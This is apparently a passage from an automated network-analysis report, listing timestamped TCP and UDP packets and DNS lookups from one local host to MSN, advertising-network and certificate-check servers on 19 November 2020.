                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.161123991 CET49762443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.161164999 CET49757443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.161552906 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.161875963 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.161986113 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162015915 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162046909 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162062883 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162080050 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162086964 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162101030 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162154913 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162178040 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162189960 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162244081 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162267923 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162286997 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162307024 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162317038 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162343025 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162353039 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162377119 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162386894 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162401915 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162403107 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162425041 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162436962 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162456989 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162523985 CET44349760151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162589073 CET49760443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162831068 CET49759443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162868977 CET49762443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.162965059 CET49757443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.163165092 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.163196087 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.163220882 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.163228989 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.163254976 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.164028883 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.164062023 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.164100885 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.164108038 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.164145947 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.165115118 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.165150881 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.165183067 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.165188074 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.165227890 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.166062117 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.166098118 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.166124105 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.166132927 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.166172028 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.167027950 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.167068958 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.167093039 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.167117119 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.167160034 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.167938948 CET44349760151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.167996883 CET49760443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.170033932 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.170070887 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.170094013 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.170123100 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.170170069 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.170809031 CET49760443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.178000927 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.178040981 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.178071022 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.178097010 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180150032 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180188894 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180216074 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180241108 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180263996 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180309057 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180319071 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180346012 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180357933 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180383921 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180448055 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180491924 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180547953 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.180588961 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.181021929 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.181049109 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.181072950 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.181082964 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.181109905 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.181149960 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.181191921 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.206887007 CET44349758151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.221148968 CET44349759151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.224966049 CET44349757151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.226078033 CET44349762151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.232356071 CET44349760151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.483903885 CET4977580192.168.2.454.230.104.94
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.484551907 CET4977680192.168.2.454.230.104.94
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.506263018 CET804977554.230.104.94192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.506362915 CET4977580192.168.2.454.230.104.94
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.506784916 CET804977654.230.104.94192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.506885052 CET4977680192.168.2.454.230.104.94
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.513952971 CET4977680192.168.2.454.230.104.94
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.536159039 CET804977654.230.104.94192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.688299894 CET804977654.230.104.94192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.690726042 CET4977680192.168.2.454.230.104.94
                                                                                                                                                                                                                      Nov 19, 2020 07:09:26.527976990 CET804977554.230.104.94192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:09:26.528285980 CET4977580192.168.2.454.230.104.94
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.767539024 CET49756443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.767657995 CET49761443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.767792940 CET49758443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.767801046 CET49759443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.767877102 CET49757443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.767926931 CET49760443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.768018007 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.768084049 CET49762443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785264015 CET44349756151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785311937 CET44349761151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785327911 CET44349756151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785341978 CET44349761151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785353899 CET44349757151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785377026 CET44349758151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785389900 CET44349759151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785402060 CET44349757151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785406113 CET49756443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785413027 CET44349758151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785423994 CET44349759151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785442114 CET44349760151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785445929 CET44349760151.101.1.44192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785504103 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785516024 CET44349762151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785527945 CET44349763151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785540104 CET44349762151.101.2.132192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785537958 CET49761443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785548925 CET49756443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785562038 CET49761443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785581112 CET49757443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785631895 CET49758443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785665035 CET49757443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785666943 CET49759443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785681009 CET49759443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785681009 CET49758443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785835028 CET49760443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785845041 CET49760443192.168.2.4151.101.1.44
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785844088 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785855055 CET49762443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785865068 CET49763443192.168.2.4151.101.2.132
                                                                                                                                                                                                                      Nov 19, 2020 07:10:03.785878897 CET49762443192.168.2.4151.101.2.132

                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Nov 19, 2020 07:08:05.759706974 CET4925753192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:05.771861076 CET53492578.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:06.596965075 CET6238953192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:06.609632015 CET53623898.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:07.858839989 CET4991053192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:07.872124910 CET53499108.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:08.793381929 CET5585453192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:08.806092978 CET53558548.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:09.733580112 CET6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:09.746591091 CET53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:10.653455019 CET6315353192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:10.666537046 CET53631538.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:12.822936058 CET5299153192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:12.841115952 CET53529918.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.047589064 CET5370053192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.067846060 CET53537008.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.372961998 CET5172653192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.385813951 CET53517268.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.394779921 CET5679453192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.407649994 CET53567948.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.755237103 CET5653453192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.767574072 CET53565348.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.793498993 CET5662753192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.812593937 CET53566278.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:16.584815979 CET5662153192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:16.610764027 CET53566218.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:17.242464066 CET6311653192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:17.256714106 CET53631168.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:17.752959967 CET6407853192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:17.766415119 CET53640788.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.133435965 CET6480153192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.159307003 CET53648018.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.215882063 CET6172153192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.230067968 CET53617218.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.377748966 CET5125553192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.391814947 CET53512558.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.728604078 CET6152253192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.747216940 CET53615228.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.321712971 CET5233753192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.334691048 CET53523378.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.823407888 CET5504653192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.832171917 CET4961253192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.843549967 CET53550468.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.852601051 CET53496128.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.377034903 CET4928553192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.390043020 CET53492858.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:30.578105927 CET5060153192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:30.591142893 CET53506018.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:31.474473000 CET6087553192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:31.488071918 CET53608758.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:32.305675983 CET5644853192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:32.318641901 CET53564488.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:33.393151045 CET5917253192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:33.406145096 CET53591728.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:33.993505955 CET6242053192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:34.005918026 CET53624208.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:42.767565966 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:43.727910995 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:43.773148060 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:44.005043983 CET53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:44.005332947 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:44.725379944 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:44.739897013 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:44.772703886 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:44.786861897 CET53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:45.820266008 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:45.833302021 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:46.779392004 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:46.791939974 CET53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:47.825894117 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:47.838068962 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:50.795634985 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:50.808130026 CET53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:51.833029985 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:51.847042084 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:53.864880085 CET6153153192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:53.892903090 CET53615318.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:55.154231071 CET4922853192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:55.166913033 CET53492288.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:55.327938080 CET5979453192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:55.382110119 CET53597948.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.425821066 CET5591653192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.441028118 CET53559168.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.509293079 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.580593109 CET53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:57.211978912 CET6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:57.244868994 CET53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:57.754956961 CET6068953192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:57.768415928 CET53606898.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:58.329437971 CET6420653192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:58.412255049 CET53642068.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:58.792061090 CET5090453192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:58.805521011 CET53509048.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:08:59.305241108 CET5752553192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:08:59.318129063 CET53575258.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:09:02.669313908 CET5381453192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:09:02.682456970 CET53538148.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:09:03.934803009 CET5341853192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:09:03.948231936 CET53534188.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:09:04.338032007 CET6283353192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:09:04.350404024 CET53628338.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:09:10.158760071 CET5926053192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:09:10.171606064 CET53592608.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:09:10.689851999 CET4994453192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:09:10.702214003 CET53499448.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:09:25.562906981 CET6330053192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:09:26.575925112 CET6330053192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:09:26.589034081 CET53633008.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:09:27.591548920 CET6330053192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:09:27.603938103 CET53633008.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:09:29.592042923 CET6330053192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:09:29.605386972 CET53633008.8.8.8192.168.2.4
                                                                                                                                                                                                                      Nov 19, 2020 07:09:33.594954967 CET6330053192.168.2.48.8.8.8
                                                                                                                                                                                                                      Nov 19, 2020 07:09:33.607466936 CET53633008.8.8.8192.168.2.4

                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.372961998 CET192.168.2.48.8.8.80x569dStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:16.584815979 CET192.168.2.48.8.8.80x94b8Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:17.242464066 CET192.168.2.48.8.8.80x9a92Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.215882063 CET192.168.2.48.8.8.80xb29dStandard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.377748966 CET192.168.2.48.8.8.80xc8a0Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.728604078 CET192.168.2.48.8.8.80x8e0dStandard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.321712971 CET192.168.2.48.8.8.80x877dStandard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.823407888 CET192.168.2.48.8.8.80xe773Standard query (0)zem.outbrainimg.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.832171917 CET192.168.2.48.8.8.80xb9a9Standard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.425821066 CET192.168.2.48.8.8.80xed7eStandard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)

